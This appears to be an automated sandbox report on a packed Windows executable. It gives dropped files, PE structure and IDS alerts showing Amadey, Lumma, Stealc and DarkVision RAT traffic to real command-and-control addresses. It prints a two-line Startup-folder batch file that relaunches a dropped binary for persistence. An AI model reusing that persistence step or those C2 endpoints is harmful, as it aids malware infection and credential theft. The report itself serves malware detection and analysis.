SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	73
Entropy (8bit):	4.746560909067808
Encrypted:	false
SSDEEP:	3:mKDDFRKn9mbZkRE5ORWRAI0Eyn:hGEi4ORHnEyn
MD5:	1E0342A7A3BD059510E2A01423F8BAD2
SHA1:	3EB5C2B68A7C14A236826851F784567F94AF0003
SHA-256:	ADD6590578FCD418A8C47F5DE9E1D7688B76D9023D4F58B50076DE743F7319B4
SHA-512:	6DA334D45886354CEB1F8C4B622FC3B26021995DF4DA61DAD44F3E4E6F41C3D92FF5450877F8E8F09D83E1FA62A234D7F4AFC28B050077FB9002C4D81DAF5F65
Malicious:	true
Preview:	@echo off..start "" "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.034269328188718286
Encrypted:	false
SSDEEP:	3:GtlstF2f1f8U3nlYlstF2f1f8U3n//lJ89//alEl:GtWt0df84lYWt0df84/tJ89XuM
MD5:	9B40AF3A2F4211FB9CA1DF0D86209741
SHA1:	BE719072BDD514C49DEBCD2AA57B1D473560511C
SHA-256:	3E61943ED477FF435FDC1BB25CBE9DCC1BB98D336AB86EA82A51976E686B7A1B
SHA-512:	D290639E97B0A35B17CA1B67D02E843C4BA3D9050DF0D1E4DC153389AE88CC260D7BC61B90D77BC19D3C0BCE6FAEC46B5C3731DC50543EAB57AD12B9D0DBEC68
Malicious:	false
Preview:	..-..........................-.f..z/....--F.c.....-..........................-.f..z/....--F.c...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	32824
Entropy (8bit):	0.03912919262454617
Encrypted:	false
SSDEEP:	3:Ol1bhf6allff5rB1fELfLl8rEXsxdwhml8XW3R2:K2uNNbEHl8dMhm93w
MD5:	5EE45E6A7DF2F9A5C5EFDC137656DEF0
SHA1:	32A3CC7A1DBA2BFE1299C774964A69949AA248DD
SHA-256:	D757E4209D4F27DA8D980038367DC6040052D93C54C574FACD1657D99A518B89
SHA-512:	F6F6256FBBAB1D40BFD9766FBFB7DF2E7F59287FBCCB1EF1A56C1AAC3DF5D63F126A9B5C33D0305BCC24155D69A57EBE70222F5F929F33C0888C65C09E1AB554
Malicious:	false
Preview:	7....-............z/.....A..\y.8..........z/........f.-.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9881
Entropy (8bit):	5.532094744003759
Encrypted:	false
SSDEEP:	192:qnaRtZYbBp6Thj4qyaaX86KakfGNBw8dJSl:delquOcwm0
MD5:	09EDA48D2FE5FDF199C4992415CF291E
SHA1:	29D7CEBD0EDF61B0DADF9D9F1ABCC815262758CD
SHA-256:	72C4E79489E90D2F502B31C0AB85C96C889F5732C5A839B1A273A241E250A4CA
SHA-512:	E1D7E98A2B7F05D78DB3671990BE28D26E22BE7FDFC8913ED849C774E75008D0BEB90AD5F02B162EB7B583F72AF5D765869765ADEE5C56F25E43EE04DD4AF1F5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9881
Entropy (8bit):	5.532094744003759
Encrypted:	false
SSDEEP:	192:qnaRtZYbBp6Thj4qyaaX86KakfGNBw8dJSl:delquOcwm0
MD5:	09EDA48D2FE5FDF199C4992415CF291E
SHA1:	29D7CEBD0EDF61B0DADF9D9F1ABCC815262758CD
SHA-256:	72C4E79489E90D2F502B31C0AB85C96C889F5732C5A839B1A273A241E250A4CA
SHA-512:	E1D7E98A2B7F05D78DB3671990BE28D26E22BE7FDFC8913ED849C774E75008D0BEB90AD5F02B162EB7B583F72AF5D765869765ADEE5C56F25E43EE04DD4AF1F5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.3995326365999787
Encrypted:	false
SSDEEP:	6:B1NsZVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lHIlcEt0:B1NmRf2RKQ1CGAFAjzvYRQVHIlcEt0
MD5:	DBC4981BF90A0188DD8571A7E134DA27
SHA1:	4D6EBDD1E3A5102D7F7FE6CDB629A4896C7D374B
SHA-256:	C888D34D841E466F56E7BC5BA8495AAAAFB3E33094BA1E1924FA14378B06F6B2
SHA-512:	507E3DA12665F02227F78CC63BE6EA30336651A2EFEA5B615092287C82381BD7E4190A35D60722EA44FD27BE6E85D055D82FD67DBE409C39D6DD17B6673D8A64
Malicious:	false
Preview:	.....B....C.?C:.l(.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.654100285282799
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'248'128 bytes
MD5:	22bf111e0ffbce40da98521c8ac390ac
SHA1:	86c47f8fc939e81d7ceba37f1824e22ce4ef1f43
SHA256:	0536c8987bbf4c736ee1ffaba0cb1e52d1652574fcb80ab14ff7d23a40e446b2
SHA512:	a9d529513d988c20380432d0ce1f10b6286a949442f6964ba455d14f51d308810b495d6e04ec375c9a990230f04a1444e7a9647c205a38275aae08b34408d30e
SSDEEP:	98304:pLPTyc5Jt2SKP64GsNe+WPvvFmuY6/JsYk:xTyc7me+W3v9Y6
TLSH:	9BE54B51A50E62EBCD9B16B4802FCD42697D42BD47740EC3A85868BDBF63CCA17B7C24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x71a000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FEE146C41FAh
movd mm6, dword ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [81210004h], ah
movsd
push esp
add al, ch
push es
cmp al, 28h
add ah, byte ptr [edi+0000003Ah]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x318364	0x10	fhtimfgd
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x318314	0x18	fhtimfgd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	9f43790b6a8bdd4edb6ed2d48e4fd7bd	False	0.559112548828125	data	7.079314060716548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x388	0x400	514f5782f497fa171df6168314823de0	False	0.453125	data	5.340697973950139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fhtimfgd	0x6b000	0x2ae000	0x2ad400	531e76301a164ef80fa67194f7cf2863	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
btpwxgez	0x319000	0x1000	0x400	dc1747cd843d6be7024db682480b2534	False	0.77734375	data	6.109706062611619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31a000	0x3000	0x2200	1f02af15e5501a86fd1f701e983bfe5f	False	0.04779411764705882	DOS executable (COM)	0.5199003715240023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x198	ASCII text, with CRLF line terminators			0.5808823529411765
RT_MANIFEST	0x69208	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T08:06:59.511251+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49931	154.216.20.243	443	TCP
2024-12-09T08:08:05.464141+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49754	185.215.113.43	80	TCP
2024-12-09T08:08:09.913160+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49766	31.41.244.11	80	TCP
2024-12-09T08:08:12.837064+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49764	TCP
2024-12-09T08:08:14.178202+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49777	185.215.113.43	80	TCP
2024-12-09T08:08:15.691581+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49783	185.215.113.16	80	TCP
2024-12-09T08:08:19.863999+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.4	55732	1.1.1.1	53	UDP
2024-12-09T08:08:21.402599+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:21.402599+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:22.413934+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:22.413934+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:22.514877+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49801	185.215.113.43	80	TCP
2024-12-09T08:08:23.678351+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:23.678351+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:23.977285+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49807	185.215.113.16	80	TCP
2024-12-09T08:08:25.083887+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:25.083887+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:26.669537+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49814	104.21.16.9	443	TCP
2024-12-09T08:08:26.669537+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49814	104.21.16.9	443	TCP
2024-12-09T08:08:29.350443+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49820	104.21.16.9	443	TCP
2024-12-09T08:08:29.350443+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49820	104.21.16.9	443	TCP
2024-12-09T08:08:30.364906+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49820	104.21.16.9	443	TCP
2024-12-09T08:08:30.761167+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49826	185.215.113.43	80	TCP
2024-12-09T08:08:31.898086+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49828	104.21.16.9	443	TCP
2024-12-09T08:08:31.898086+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49828	104.21.16.9	443	TCP
2024-12-09T08:08:32.221808+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49829	185.215.113.16	80	TCP
2024-12-09T08:08:32.360094+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:32.806167+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:33.120297+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49827	TCP
2024-12-09T08:08:33.445553+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:33.574627+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49827	TCP
2024-12-09T08:08:34.631758+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49840	104.21.16.9	443	TCP
2024-12-09T08:08:34.631758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49840	104.21.16.9	443	TCP
2024-12-09T08:08:35.191730+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:35.903722+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:36.634989+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:36.634989+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:37.321256+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49847	104.21.16.9	443	TCP
2024-12-09T08:08:37.321256+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49847	104.21.16.9	443	TCP
2024-12-09T08:08:37.844797+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49848	185.215.113.43	80	TCP
2024-12-09T08:08:38.123996+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:38.123996+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:39.309393+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49854	185.215.113.16	80	TCP
2024-12-09T08:08:39.419684+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49855	104.21.16.9	443	TCP
2024-12-09T08:08:39.419684+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49855	104.21.16.9	443	TCP
2024-12-09T08:08:48.307412+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:08:48.307412+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:08:49.169752+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:08:50.129735+0100	2045618	ET MALWARE Win32/DarkVision RAT CnC Checkin M1	1	192.168.2.4	49888	185.157.162.216	5200	TCP
